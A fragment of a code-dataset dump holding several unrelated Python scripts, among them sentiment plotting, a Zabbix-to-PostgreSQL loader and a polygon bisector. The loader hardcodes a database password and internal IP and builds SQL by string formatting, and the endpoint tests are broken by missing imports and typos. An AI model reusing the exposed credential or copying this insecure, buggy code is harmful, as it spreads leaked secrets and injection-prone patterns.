False\n\t\tftemp.write(line)\n\tftemp.close()\n\n","sub_path":"src/bb_fix.py","file_name":"bb_fix.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276348379","text":"'''\r\nIn this project, you will visualize the feelings and language used in a set of\r\nTweets. This starter code loads the appropriate libraries and the Twitter data you'll\r\nneed!\r\n'''\r\n\r\nimport json\r\nfrom textblob import TextBlob\r\n\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom wordcloud import WordCloud\r\n\r\n#Get the JSON data\r\ntweetFile = open(\"tweets_small.json\", \"r\")\r\ntweetData = json.load(tweetFile)\r\ntweetFile.close()\r\n# print(tweetData)\r\n# Continue your program below!\r\n\r\n# Get TextBlob\r\nls = [[], []]\r\nfor each in tweetData:\r\n tweet = each[\"text\"]\r\n tb = TextBlob(tweet)\r\n ls[0].append(tb.polarity)\r\n ls[1].append(tb.subjectivity)\r\n\r\n# Diagrams\r\ndef diagram(ls):\r\n f = plt.figure(1)\r\n plt.hist(ls[0], bins = 20)\r\n plt.xlabel(\"Polarity\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title(\"Tweet polarity\")\r\n f.show()\r\n f.savefig(\"tweet_polarity.png\")\r\n\r\n g = plt.figure(2)\r\n plt.hist(ls[1], bins = 20)\r\n plt.xlabel(\"Subjectivity\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title(\"Tweet subjectivity\")\r\n g.show()\r\n f.savefig(\"tweet_subjectivity.png\")\r\n\r\n h = plt.figure(3)\r\n plt.scatter(ls[0], ls[1])\r\n plt.xlabel(\"Polarity\")\r\n plt.ylabel(\"Subjectivity\")\r\n plt.title(\"polarity vs. subjectivity\")\r\n h.show()\r\n h.savefig(\"polarity vs. 
subjectivity.png\")\r\n\r\n input()\r\n\r\n# Word Cloud by Frequency\r\ndef word_cloud_freq(tweetData):\r\n all_text = \"\"\r\n word_count = {}\r\n for each in tweetData:\r\n all_text += each[\"text\"]\r\n all_text = all_text.lower()\r\n atb = TextBlob(all_text)\r\n word_list = atb.words\r\n for each in word_list:\r\n if len(each) > 3 and each.isalpha() == True and each != \"https\":\r\n if each not in word_count:\r\n word_count[each] = 1\r\n else:\r\n word_count[each] += 1\r\n wc = WordCloud(background_color=\"white\", width=900,height=500,\r\n relative_scaling=1).generate_from_frequencies(word_count)\r\n plt.imshow(wc, interpolation='bilinear')\r\n plt.show()\r\n\r\n# Combined word cloud\r\nword_cloud_freq(tweetData)\r\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"135735351","text":"import numpy as np\nimport pandas as pd\nimport pandas_profiling\n\ndf = pd.read_csv('C:\\myfiles\\QA\\grepserpython\\generalscripts_python\\\\flywheel\\\\201906271006-Amazon-com-SOV-Base-2019-06-27.csv', encoding='latin')\n\nprofile = pandas_profiling.ProfileReport(df)\ndf.drop(['Country', 'Client_Name', 'Business_Unit', 'Retailer', 'Brand', 'Page', 'URL', 'Rank', 'Price',\n 'Absolute_Rank', 'UTCTime', 'Search_Dept_Sponsored', 'Search_Dept', 'Customer_ASIN', 'Price',\n 'Zone_Name', 'Zone_ID', 'Scrape_Source', 'Search_Dept_Dropdown', 'Search_Dept_Dropdown_ID',\n 'Other_Sellers_Price', 'Private_Label_Container', 'Average_Rating', 'Total_Reviews', 'Private_Label'], axis=1).head()\n\npd.value_counts(df['Keyword']).plot(kind='pie').invert_yaxis()\nprofile.to_file(output_file=\"output1.html\")","sub_path":"generalscripts_python/pandasprofilingsample.py","file_name":"pandasprofilingsample.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"228312905","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport sys\nimport psycopg2\nimport time, datetime\n\nif sys.platform.startswith('win32') or sys.platform.startswith('cygwin'): # para debug quando estiver no WINDOWS\n OS = \"Windows\"\n pathModulos = r\"C:\\Users\\p788036\\Desktop\\API Zabbix\"\nelse:\n OS = \"Linux\"\n pathModulos = '/opt/scripts/work/modulos/'\n\nif pathModulos not in sys.path:\n sys.path.append(pathModulos)\n\n\nfrom functionsCaixa import *\nfrom Util import LogX3\n\n\ndef conectar_postgresql():\n try:\n DBUSERNAME = 'automacao'\n DBPASSWORD = 'Iop567#@'\n #DBUSERNAME = 'postgres'\n #DBPASSWORD = '123qwe.'\n DBNAME = 'data_criacao_equip_zabbix'\n #HOST = 'localhost'\n HOST = '10.216.76.232'\n conn = psycopg2.connect(host=HOST, database=DBNAME, user=DBUSERNAME, password=DBPASSWORD)\n cursor = conn.cursor()\n return conn, cursor\n except Exception as ex:\n print(ex)\n\n\ndef List_Insert():\n conn, cursor = conectar_postgresql()\n host = \"\"\n\n listaDic = []\n hosts = Host.get_HostHostEnable(host)\n for i in range(0,len(hosts)):\n inventario = Host.get_InventoryHost(hosts[i])\n try:\n dataPT = inventario[0]['inventory']['date_hw_install']\n except Exception as msg:\n print(msg)\n dataPT = ''\n if '' == dataPT:\n continue\n\n data1 = datetime.datetime.strptime(dataPT, \"%d/%m/%Y\")\n data = data1.strftime(\"%Y-%m-%d\")\n\n if [] != inventario[0]['inventory'] and \"\" != inventario[0]['inventory']['date_hw_install']:\n dic = {\"HostName\": hosts[i], \"Nome Visivel\": inventario[0]['name'], \"Data da 
criação\": data, \"Hostid\": inventario[0]['hostid']}\n\n try:\n #print(inventario[0]['hostid'], hosts[i],inventario[0]['name'], data)\n sql = \"\"\"INSERT INTO public.data_equipamentos_temp(hostid, hostname, nome_visivel, data_criacao)VALUES('{0}','{1}','{2}','{3}');\"\"\".format(\n inventario[0]['hostid'],hosts[i],inventario[0]['name'], data)\n\n cursor.execute(u\"{0}\".format(sql))\n conn.commit()\n\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n\n\n conn.close()\n\ndef delete_table(tabelaDelete):\n conn, cursor = conectar_postgresql()\n\n sqlD = \"\"\"begin;\n DELETE FROM public.{0};\"\"\".format(tabelaDelete)\n try:\n cur = conn.cursor()\n cur.execute(sqlD)\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n\n conn.commit()\n conn.close()\n\ndef insert_table(tmp, prd):\n conn, cursor = conectar_postgresql()\n\n sqlD = \"\"\"begin;\n DELETE FROM public.{1};\n insert into {1} SELECT * FROM {0};\n commit;\"\"\".format(tmp, prd)\n try:\n cur = conn.cursor()\n cur.execute(sqlD)\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n\n conn.commit()\n conn.close()\n\n\n\ndef select():\n conn, cursor = conectar_postgresql()\n\n\n try:\n cursor.execute(\"\"\"select count(*) from public.data_equipamentos_temp;\"\"\")\n quant = cursor.fetchone()\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n\n conn.commit()\n conn.close()\n\n return quant\n\ndef ultima_carga(log):\n conn, cursor = conectar_postgresql()\n\n sql = \"\"\"begin;\n DELETE FROM public.ultima_carga;\n INSERT INTO public.ultima_carga(\"log\")\n VALUES ('{0}');\n commit;\"\"\".format(log)\n\n try:\n cur = conn.cursor()\n cur.execute(sql)\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n quant = select()[0]\n agora = datetime.datetime.now()\n inicio = agora.strftime(\"%d/%m/%Y %H:%M\")\n print(inicio)\n\n print(\"Deletando a tabela temp.....\")\n delete_table(\"data_equipamentos_temp\")\n\n print(\"Gerando Datas\"\n \"Fazendo Insert na tabela temp.....\")\n List_Insert()\n agora = datetime.datetime.now()\n fim = agora.strftime(\"%d/%m/%Y %H:%M\")\n\n if quant > 0:\n print(\"Deletando Tabela Prd Fazendo Insert na tabela principal.....\")\n insert_table(\"data_equipamentos_temp\", \"data_equipamentos\")\n\n LogX3.writelog(\"Insert Datas Realizada com Sucesso inicio {0},fim {1}\".format(inicio, fim), \"./Insert_datas.log\", \"INFO\")\n ultima_carga(\"OK\")\n else:\n LogX3.writelog(\"Insert Datas Não Realizado inicio {0},fim {1}\".format(inicio, fim), \"./Insert_datas.log\", \"INFO\")\n ultima_carga(\"FALHA\")\n","sub_path":"data_driacao_dquipamentos/dataCriação_equipamentos.py","file_name":"dataCriação_equipamentos.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"158564459","text":"import unittest\n\nimport endpoints\nimport pytest\nimport mock\nimport requests\n\nfrom endpoints import message_types\n\nimport main\n\n\nclass TestEndpoints(TestCase):\n \"\"\"\n Test to makes sure that all endpoints exists. 
Note that\n these tests does not are testing the response output.\n \"\"\"\n\n def setUp(self):\n self.url = '/_ah/api/echo/v1'\n\n @patch('requests.post')\n def test_post_endpoint(self, mock_post):\n url_method_post = '{}/create'.format(self.url)\n info = {'color': 'Yellow', 'brakes': 'Disco'}\n resp = requests.post(url_method_post, data=json.dumps(info), headers={'Content-Type': 'application/json'})\n\n mock_post.assert_called_with(url_method_post, data=json.dumps(info), headers={'Content-Type': 'application/json'})\n self.assertEqual(resp.status_code, 200)\n\n @patch('requests.get')\n def test_get_endpoint(self, mock_get):\n url_method_get = '{}/consult?color=Red'.format(self.url)\n resp = requests.get(url_method_get, headers={'Content-Type': 'application/json'})\n\n mock_get.assert_called_with(url_method_get, headers={'Content-Type': 'application/json'})\n self.assertEqual(resp.status_code, 200)\n\n @path('requets.put')\n def test_put_endpoint(self, mock_put):\n url_method_put = '{}/update/123'.format(self.url)\n info = {'color': 'Red'}\n resp = requests.put(url_method_put, data=json.dumps(info), headers={'Content-Type': 'application/json'})\n\n mock_put.assert_called_with(url_method_put, data=json.dumps(info), headers={'Content-Type': 'application/json'})\n self.assertEqual(resp.status_code, 200)\n\n @patch('requests.delete')\n def test_delete_endpoint(self, mock_delete):\n url_method_delete = '{}/delete/123'.format(self.url)\n resp = requests.delete(url_method_delete, headers={'Content-Type': 'application/json'})\n\n mock_delete.assert_called_with(url_method_delete, headers={'Content-Type': 'application/json'})\n self.assertEqual(resp.status_code, 200)\n\n\ndef test_echo():\n api = main.EchoApi()\n request = main.EchoApi.echo.remote.request_type(content='Hello world!')\n response = api.echo(request)\n assert 'Hello world!' == response.content","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590199332","text":"import re\ndef baseConvertTo16(n,x):\n prep=int(n,x) #==1302\n convert=hex(prep)\\\n #return convert\n #how do we calculate the reverse:\n #1302 ->'ca'\n regexer=r\"[a-b0-9]+[x]\"\n cut=re.sub(regexer,\"\",convert)\n print(cut)\n\nbaseConvertTo16('z',36)","sub_path":"DI_IoC_Prac/CodeSignalPy/CodeSignalPy.py","file_name":"CodeSignalPy.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"114351372","text":"'''\nGiven three sorted arrays A, B and C of size N, M and P respectively. \nThe task is to merge them into a single array which must be sorted in increasing order.\n\nInput:\nFirst line of input contains number of testcases T. For each testcase, first line of input contains size of three arrays N, M and P. \nNext three lines contains N, M and P elements for arrays.\n\nOutput:\nOutput the merged sorted array.\n\nYour Task:\nThis is a function problem. You only need to complete the function mergeThree() that takes A,B,C as parameters. 
\nThe function returns an array or vector.\n\nConstraints:\n1 <= T <= 100\n1 <= N, M, P <= 106\n1 <= A[i], B[i], C[i] <= 106\n\nExample:\nInput:\n2\n4 5 6\n1 2 3 4\n1 2 3 4 5\n1 2 3 4 5 6\n2 3 4\n1 2\n2 3 4\n4 5 6 7\nOutput:\n1 1 1 2 2 2 3 3 3 4 4 4 5 5 6\n1 2 2 3 4 4 5 6 7\n\nExplanation:\nTestcase 1: Merging these three sorted arrays, we have elements as 1 1 1 2 2 2 3 3 3 4 4 4 5 5 6.\nTestcase 2: Merging three sorted arrays , we have elements as 1 2 2 3 4 4 5 6 7.\n\nhints:\n\n1)\nTry solving it with same method as Merge 2 sorted arrays (Extra space allowed solution).\nThe difference is instead of 2, 3 arrays are available.\nWhat all changes should occur due to this...??\n\n2)\nThe complete solution:\n\nMake an output array to store the complete result of merging 3 sorted arrays.\nIterate through all the 3 arrays at once, using different iterators for each array, and storing the minimum of all in the output array.\nAfter this loop exits, this shows one loop has exhausted. And 2 arrays are still left. Make cases accordingly.\nTotal 3 cases will be made, i.e if A exhausts, iterate for B & C, and if B exhausts iterate for A & C, and so on.\nAfter this loop also exits, a single array is still left. Make the cases for the same accordingly. And output the the remaining array.\n\n'''\ndef mergeThree(A,B,C):\n \n m, n, o = len(A), len(B), len(C)\n i = j = k = 0\n \n # Destination array \n d = []\n \n while(i < m and j < n and k < o):\n \n # Get Minimum element\n mini = min(A[i], B[j], C[k])\n \n d.append(mini)\n \n # Increment the source pointer which gives minimum element\n if(A[i] == mini):\n i += 1\n elif(B[j] == mini):\n j += 1\n elif(C[k] == mini):\n k += 1\n \n # Merge a and b if c has exhausted \n while(i < m and j < n):\n if(A[i] <= B[j]):\n d.append(A[i])\n i += 1\n else:\n d.append(B[j])\n j += 1\n \n # Merge b and c if a has exhausted \n while(j < n and k < o): \n if(B[j] <= C[k]):\n d.append(B[j]) \n j += 1\n else: \n d.append(C[k]) \n k += 1\n \n # Merge a and c if b has exhausted \n while(i < m and k < o): \n if(A[i] <= C[k]): \n d.append(A[i]) \n i += 1\n else: \n d.append(C[k]) \n k += 1\n \n #Take elements from a if b and c have exhausted \n while(i < m): \n d.append(A[i]) \n i += 1\n\n # Take elements from b if a and c have exhausted \n while(j < n): \n d.append(B[j]) \n j += 1\n\n # Take elements from c if a and b have exhausted \n while(k < o):\n d.append(C[k]) \n k += 1\n \n return d\n \nA = [1, 2, 41, 52, 84] \nB = [1, 2, 41, 52, 67] \nC = [1, 2, 41, 52, 67, 85]\n\nprint(mergeThree(A, B, C)) ","sub_path":"geeksforgeeks/sorting/17_merge_three_sorted_arrays.py","file_name":"17_merge_three_sorted_arrays.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300000506","text":"import openpyxl\r\n\r\nwb=openpyxl.load_workbook(\"2018Budgets.xlsx\")\r\nfor item in wb.get_sheet_names():\r\n print (item)\r\n\r\nsheet = wb.get_sheet_by_name('Table 1')\r\ncellRange = sheet ['A1':'P1']\r\nfor cell in cellRange:\r\n print(cell.coordinate, cell.value)\r\n print(\"END\")\r\n \r\n\r\n\r\n\r\n","sub_path":"pyXLSX.py","file_name":"pyXLSX.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"454109918","text":"import sys\r\nimport math\r\nimport numpy as np\r\nimport math\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef getVertices(filename):\r\n vertices = []\r\n with open(filename) as file:\r\n 
for data in file:\r\n if data.__contains__(\" \"):\r\n data = data.split(\" \")\r\n vertices.append([int(data[0].strip()), int(data[1].strip())])\r\n\r\n return vertices\r\n\r\n\r\ndef main(vertices):\r\n coordForTriang = sorted(vertices[:len(vertices) - 1], key=lambda x: x[0])\r\n triangulatedGroups = []\r\n for index in range(len(coordForTriang) - 2):\r\n triangulatedGroups.append(coordForTriang[index:index + 3])\r\n\r\n L = []\r\n P1 = []\r\n P2 = [x for x in vertices]\r\n Per1 = 0\r\n Per2 = calculatePerimeter(vertices)\r\n\r\n for territory in range(len(triangulatedGroups)):\r\n region1Area = calculateArea(P1) + calculateArea(triangulatedGroups[territory])\r\n region2Area = calculateArea(P2) - calculateArea(triangulatedGroups[territory])\r\n\r\n if region1Area > region2Area:\r\n p = triangulatedGroups[territory][1]\r\n r = triangulatedGroups[territory][0]\r\n s = triangulatedGroups[territory][2]\r\n D1 = region1Area - region2Area\r\n tempQ = (D1 / (2 * calculateArea(triangulatedGroups[territory])))\r\n tempQ = [tempQ * (r[0] - s[0]), tempQ * (r[1] - s[1])]\r\n q = [tempQ[0] + s[0], tempQ[1] + s[1]]\r\n L = [p, q, s, r]\r\n return [L, P1, P2, Per1, Per2]\r\n P1 = addTerritory(P1, triangulatedGroups[territory])\r\n P2 = removeTerritory(P2, triangulatedGroups[territory])\r\n if territory == 0:\r\n Per1 = Per1 + distance(triangulatedGroups[territory][1], triangulatedGroups[territory][2]) \\\r\n + distance(triangulatedGroups[territory][1], triangulatedGroups[territory][0])\r\n Per2 = Per2 - distance(triangulatedGroups[territory][1], triangulatedGroups[territory][2]) \\\r\n - distance(triangulatedGroups[territory][1], triangulatedGroups[territory][0])\r\n else:\r\n Per1 = Per1 + distance(triangulatedGroups[territory][1], triangulatedGroups[territory][2])\r\n Per2 = Per2 - distance(triangulatedGroups[territory][1], triangulatedGroups[territory][2])\r\n return None\r\n\r\n\r\ndef addTerritory(P=[], T=[]):\r\n if len(P) == 0:\r\n P = T\r\n else:\r\n P.pop()\r\n P.insert(P.index(T[1]), T[2])\r\n P.append(P[0])\r\n return P\r\n\r\n\r\ndef removeTerritory(P=[], T=[]):\r\n if len(P) > 3:\r\n P.remove(T[0])\r\n P[len(P) - 1] = P[0]\r\n return P\r\n else:\r\n return []\r\n\r\n\r\ndef calculateArea(P=[]):\r\n if len(P) < 2:\r\n return 0\r\n area = 0\r\n for i in range(len(P) - 1):\r\n point1 = P[i]\r\n point2 = P[i + 1]\r\n areaCal = (point2[0] - point1[0]) * (point2[1] + point1[1]) / 2\r\n area -= areaCal\r\n point1 = P[-1]\r\n point2 = P[0]\r\n areaCal = (point2[0] - point1[0]) * (point2[1] + point1[1]) / 2\r\n area -= areaCal\r\n return abs(area)\r\n\r\n\r\ndef calculatePerimeter(coorList=[]):\r\n perimeter = 0\r\n for i in range(len(coorList) - 1):\r\n point1 = coorList[i]\r\n point2 = coorList[i + 1]\r\n perimeter += distance(point1, point2)\r\n perimeter += distance(coorList[len(coorList) - 1], coorList[0])\r\n return perimeter\r\n\r\n\r\ndef distance(point1=[], point2=[]):\r\n return math.sqrt(math.pow(point2[1] - point1[1], 2) + math.pow(point2[0] - point1[0], 2))\r\n\r\n\r\n\"\"\"\r\n************************************************************************************\r\n\"\"\"\r\n\r\n\r\nclass AB:\r\n __slots__ = 'p', 'q', 'r', 's'\r\n\r\n def __init__(self, p, q, r, s):\r\n self.p = p\r\n self.q = q\r\n self.r = r\r\n self.s = s\r\n\r\n\r\ndef area_polygon(vertices):\r\n result = 0\r\n for i in range(len(vertices)):\r\n current_vertex = vertices[i]\r\n next_vertex = vertices[(i + 1) % len(vertices)]\r\n\r\n result += ((next_vertex[0] - current_vertex[0]) * (current_vertex[1] + 
next_vertex[1])) / 2\r\n\r\n return abs(result)\r\n\r\n\r\ndef perimeter_polygon(vertices):\r\n result = 0\r\n for i in range(len(vertices)):\r\n current_vertex = vertices[i]\r\n next_vertex = vertices[(i + 1) % len(vertices)]\r\n\r\n result += segment_length(current_vertex, next_vertex)\r\n\r\n return result\r\n\r\n\r\ndef segment_length(vertex1, vertex2):\r\n return math.sqrt((vertex2[0] - vertex1[0]) ** 2 + (vertex2[1] - vertex1[1]) ** 2)\r\n\r\n\r\ndef cross_product(vector1, vector2):\r\n return (vector1[0] * vector2[1]) - (vector1[1] * vector2[0])\r\n\r\n\r\ndef sin_vertices(vertice1, vertice2, vertice3):\r\n length1 = segment_length(vertice1, vertice2)\r\n length2 = segment_length(vertice3, vertice2)\r\n\r\n crossproduct = cross_product([vertice1[0] - vertice2[0], vertice1[1] - vertice2[1]],\r\n [vertice3[0] - vertice2[0], vertice3[1] - vertice2[1]])\r\n return crossproduct / (length1 * length2)\r\n\r\n\r\ndef intersection(segment1, segment2):\r\n a1 = (segment1[1][1] - segment1[0][1]) / (segment1[1][0] - segment1[0][0])\r\n a2 = (segment2[1][1] - segment2[0][1]) / (segment2[1][0] - segment2[0][0])\r\n\r\n b1 = (a1 * segment1[0][0]) - segment1[0][1]\r\n b2 = (a2 * segment2[0][0]) - segment2[0][1]\r\n\r\n x = (b2 - b1) / (a2 - a1)\r\n y = (a1 * x) - b1\r\n\r\n return [x, y]\r\n\r\n\r\ndef update(vertices, area_bisector, set_bisectors):\r\n p = area_bisector.p\r\n q = area_bisector.q\r\n r = area_bisector.r\r\n s = area_bisector.s\r\n\r\n p_index = vertices.index(p)\r\n p1 = vertices[(p_index - 1) % len(vertices)]\r\n p2 = vertices[(p_index + 1) % len(vertices)]\r\n\r\n o1 = intersection([p, q], [s, p1]) # pq intersection sp1\r\n o2 = intersection([p, q], [r, p2]) # pq intersection rp2\r\n\r\n p1_prime = None\r\n p2_prime = None\r\n q1_prime = None\r\n q2_prime = None\r\n\r\n L1 = None\r\n L2 = None\r\n L3 = None\r\n L4 = None\r\n if area_polygon([q, r, o2]) <= area_polygon([p, p2, o2]): # pq\r\n num = ((area_polygon([p, p2, o2]) - area_polygon([q, r, o2])) /\r\n cross_product([r[0] - p2[0], r[1] - p2[1]], [p[0] - p2[0], p[1] - p2[1]]))\r\n\r\n vector = [p[0] - p2[0], p[1] - p2[1]]\r\n offset_vector = [num * element for element in vector]\r\n\r\n p1_prime = [p2[0] + offset_vector[0], p2[1] + offset_vector[1]]\r\n L1 = AB(r, p1_prime, p2, p)\r\n # L1 = [r, p1_prime]\r\n if area_polygon([q, s, o1]) <= area_polygon([p, p1, o1]):\r\n num = ((area_polygon([p, p1, o1]) - area_polygon([q, s, o1])) /\r\n cross_product([p[0] - p1[0], p[1] - p1[1]], [s[0] - p1[0], s[1] - p1[1]]))\r\n\r\n vector = [p[0] - p1[0], p[1] - p1[1]]\r\n offset_vector = [num * element for element in vector]\r\n\r\n p2_prime = [p1[0] + offset_vector[0], p1[1] + offset_vector[1]]\r\n L2 = AB(s, p2_prime, p, p1)\r\n # L2 = [s, p2_prime]\r\n if area_polygon([q, s, o1]) >= area_polygon([p, p1, o1]):\r\n sq = segment_length(s, q)\r\n sp1 = segment_length(s, p1)\r\n sin_rsp1 = sin_vertices(r, s, p1)\r\n num = (area_polygon([q, s, o1]) - (area_polygon([p, p1, o1])) / sq * sp1 * sin_rsp1)\r\n\r\n vector = [q[0] - s[0], q[1] - s[1]]\r\n offset_vector = [num * element for element in vector]\r\n\r\n q1_prime = [s[0] + offset_vector[0], s[1] + offset_vector[1]]\r\n L3 = AB(p1, q1_prime, r, s)\r\n # L3 = [p1, q1_prime]\r\n if area_polygon([q, r, o2]) >= area_polygon([p, p2, o2]):\r\n rq = segment_length(r, q)\r\n rp2 = segment_length(r, p2)\r\n sin_srp2 = sin_vertices(s, r, p2)\r\n\r\n num = (area_polygon([q, r, o2]) - (area_polygon([p, p2, o2])) / rq * rp2 * sin_srp2)\r\n\r\n vector = [q[0] - r[0], q[1] - r[1]]\r\n offset_vector = 
[num * element for element in vector]\r\n\r\n q2_prime = [r[0] + offset_vector[0], r[1] + offset_vector[1]]\r\n L4 = AB(p2, q2_prime, r, s)\r\n # L4 = [p2, q2_prime]\r\n\r\n L1_prime = None\r\n L2_prime = None\r\n\r\n if L1 is not None:\r\n L1_prime = L1\r\n else:\r\n L1_prime = L4\r\n\r\n if L2 is not None:\r\n L2_prime = L2\r\n else:\r\n L2_prime = L3\r\n\r\n # if p1_prime is None:\r\n # p1_prime = q2_prime # q1_prime in paper\r\n # r = p2\r\n # if p2_prime is None:\r\n # p2_prime = q1_prime # q2_prime in paper\r\n # s = p1\r\n\r\n a = None\r\n b = None\r\n\r\n P1 = [q]\r\n P2 = []\r\n for i in range(0, (vertices.index(p) - vertices.index(r) + 1 + len(vertices)) % len(vertices)):\r\n P1.append(vertices[(vertices.index(r) + i) % len(vertices)])\r\n for i in range(0, (vertices.index(s) - vertices.index(p) + 1 + len(vertices)) % len(vertices)):\r\n P2.append(vertices[(vertices.index(p) + i) % len(vertices)])\r\n P2.append(q)\r\n\r\n P11 = [L1_prime.q]\r\n P12 = []\r\n for i in range(0, (vertices.index(L1_prime.p) - vertices.index(L1_prime.r) + 1 + len(vertices)) % len(vertices)):\r\n P11.append(vertices[(vertices.index(L1_prime.r) + i) % len(vertices)])\r\n for i in range(0, (vertices.index(L1_prime.s) - vertices.index(L1_prime.p) + 1 + len(vertices)) % len(vertices)):\r\n P12.append(vertices[(vertices.index(L1_prime.p) + i) % len(vertices)])\r\n P12.append(L1_prime.q)\r\n\r\n P21 = [L2_prime.q]\r\n P22 = []\r\n for i in range(0, (vertices.index(L2_prime.p) - vertices.index(L2_prime.r) + 1 + len(vertices)) % len(vertices)):\r\n P21.append(vertices[(vertices.index(L2_prime.r) + i) % len(vertices)])\r\n for i in range(0, (vertices.index(L2_prime.s) - vertices.index(L2_prime.p) + 1 + len(vertices)) % len(vertices)):\r\n P22.append(vertices[(vertices.index(L2_prime.p) + i) % len(vertices)])\r\n P22.append(L2_prime.q)\r\n\r\n return [P11, P12, P21, P22]\r\n\r\n\r\n\"\"\"\r\n************************************************************************************\r\n\"\"\"\r\ndef plotPts(P1=[], P2=[]):\r\n x = []\r\n y = []\r\n for p in P1:\r\n x.append(p[0])\r\n y.append(p[1])\r\n plt.fill(x, y, color=\"b\")\r\n plt.plot(x, y)\r\n\r\n x = []\r\n y = []\r\n for p in P2:\r\n x.append(p[0])\r\n y.append(p[1])\r\n plt.fill(x, y, color=\"b\")\r\n plt.plot(x, y)\r\n plt.show()\r\n\r\n\r\nfilename = sys.argv[1]\r\nvertices = getVertices(filename)\r\nresult = main(vertices)\r\nL = result[0]\r\nL = AB(L[0], L[1], L[2], L[3])\r\nvertices.pop()\r\n\r\nP1 = result[1]\r\nP1.insert(P1.index(result[0][0])+1, result[0][1])\r\nP2 = result[2]\r\nP2[0] = result[0][1]\r\nP2[len(P2)-1] = result[0][1]\r\nplotPts(P1, P2)\r\nresultPts = update(vertices, L, [])\r\nresultPts[0].append(resultPts[0][0])\r\nresultPts[1].append(resultPts[1][0])\r\nresultPts[2].append(resultPts[2][0])\r\nresultPts[3].append(resultPts[3][0])\r\nprint(resultPts)\r\nplotPts(resultPts[0], resultPts[1])\r\nplotPts(resultPts[2], resultPts[3])\r\n# for _ in range(len(vertices)):\r\n# L, P1, P2, isDone = update(vertices, L, [])\r\n# print(isDone)\r\n# if isDone:\r\n# break\r\n# print(L.p, ' ', L.q)\r\n# print(P1)\r\n# print(P2)\r\n# print(perimeter_polygon(P1), perimeter_polygon(P2))\r\n# print(calculateArea(P1), calculateArea(P2))\r\n\r\n# Code to calculate exact points\r\n# \tdp = perimeter_polygon(P1) - perimeter_polygon(P2)\r\n# dp1 = perimeter_polygon(P11) - perimeter_polygon(P12)\r\n# dp2 = perimeter_polygon(P21) - perimeter_polygon(P22)\r\n#\r\n# L_prime = None\r\n# P1_prime = None\r\n# P2_prime = None\r\n#\r\n# if dp == 0:\r\n# a = p\r\n# b = 
q\r\n# L_prime = AB(p, q, r, s)\r\n# P1_prime = P1\r\n# P2_prime = P2\r\n#\r\n# return L_prime, P1_prime, P2_prime, True\r\n# elif dp * dp1 < 0 or dp * dp2 < 0:\r\n# d = None\r\n# c = None\r\n# if dp * dp1 < 0: # dp = dp1 in paper\r\n# d = L1_prime.p\r\n# c = L1_prime.q\r\n# else: # dp = dp2 in paper\r\n# d = L2_prime.p\r\n# c = L2_prime.q\r\n#\r\n# area_dpq = area_polygon([d, p, q])\r\n# area_cpq = area_polygon([c, p, q])\r\n# A = area_dpq - area_cpq\r\n# B = (area_cpq * (dp/2 + segment_length(q, d))) - (area_dpq * (dp/2 + segment_length(p, c)))\r\n# C = - area_cpq * dp * segment_length(q, d)\r\n#\r\n# qb1 = None\r\n# qb2 = None\r\n# qb = None\r\n# if area_dpq == area_cpq:\r\n# qb1 = -C / B\r\n# qb2 = qb1\r\n# qb = -C / B\r\n# else:\r\n# qb1 = (-B + math.sqrt(abs((B ** 2) - (4 * A * C)))) / (2 * A)\r\n# qb2 = (-B - math.sqrt(abs((B ** 2) - (4 * A * C)))) / (2 * A)\r\n# qb = (-B + math.sqrt(abs((B ** 2) - (4 * A * C)))) / (2 * A)\r\n#\r\n# qb = qb1\r\n# b = [q[i] + (d[i] - q[i]) * qb for i in range(len(q))]\r\n# pa = qb - dp/2 # dp/2 in code part of paper\r\n# a = [p[i] + (c[i] - p[i]) * pa for i in range(len(p))]\r\n# O = intersection([a, b], [p, q]) # intersection of ab and pq\r\n#\r\n# if abs(area_polygon([a, O, p]) - area_polygon([b, O, q])) > 0.1:\r\n# qb = qb2\r\n# b = [q[i] + (d[i] - q[i]) * qb for i in range(len(q))]\r\n# pa = qb - dp/2 # dp/2 in code part of paper\r\n# a = [p[i] + (c[i] - p[i]) * pa for i in range(len(p))]\r\n#\r\n# L_prime = AB(a, b, q, d)\r\n# P1_prime = [b] + P1\r\n# P2_prime = [a] + P2\r\n# P1_prime.pop()\r\n# P2_prime.pop()\r\n#\r\n# return L_prime, P1_prime, P2_prime, True\r\n# else:\r\n# if dp1 < dp2:\r\n# L_prime = L1_prime\r\n# P1_prime = P11\r\n# P2_prime = P12\r\n# else:\r\n# L_prime = L2_prime\r\n# P1_prime = P21\r\n# P2_prime = P22\r\n#\r\n# return L_prime, P1_prime, P2_prime, 